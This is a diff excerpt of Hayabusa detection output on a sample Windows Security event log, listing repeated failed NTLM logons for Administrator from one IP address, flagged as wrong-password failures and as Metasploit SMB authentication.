+2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CtdqW8zOw1GoQcvA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aY6FLi1edRZWrRZN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ah1JoKfxJzQhCCVL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gIMOZRGcv4o33BWd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nmLyLJoVZz6fJ62I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aGufqEGD4hFf2XLM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7IEdKy2H5Agblpjt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XT9k8C05GVLBNPdl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5opHh8HelCXtR5Cm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K0dntDwYLmag9efo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UQfZOMFV9LtY7r2S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y01v38dTUIsJEZIv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pCP8x2QBZ6IvMEnf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hgcbYjw3kKqlK7Di  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TFU97Tq3e7IWvSKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1hUCvaS1yM2FU9AE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8JInVlBqTSfT4J1s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EjXRQUGDKBZaMkw3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fZPXNxkGOrld5eCR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OBDhSrF7DZ1KBRa8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dQ7TKJOGibAVNoCH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZE1GARxx03m4FtEL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gf3VLLTxsK85bsrv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 58G6MFVbW55JZIV5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yxne9LqZCqBf3qkc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ssZya6gArnuepKyW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rsDEj6o0NaKUYPZL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pELSIsupIYAxPCtv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: urHCDmdCfNexxUHf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: czGXZFukLquA9Mce  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: icWMY9pKCQMyTxJg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v28FLC2WXEXSUiI5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FwhjHww5iA51SFjp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 96BwmhKqDIojhdRA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DiRvofjwoeAdHYrv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BNLdOrPwbvYELiCc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x15WKTspmg2ALHaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QMoQWddkcYtCmoKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jhTbfX42Pwn7OA2k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yXcbUCgAhVFfqLc3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GHyXVM0jpaKBiY9N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TZoWEcU6VbEnrLpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LIfEzNQWwvrai4ga  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DhImfqWz7SHId9hE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s6sekQfneNE5uFtx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iEQ6KkZEHGcSgdA8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
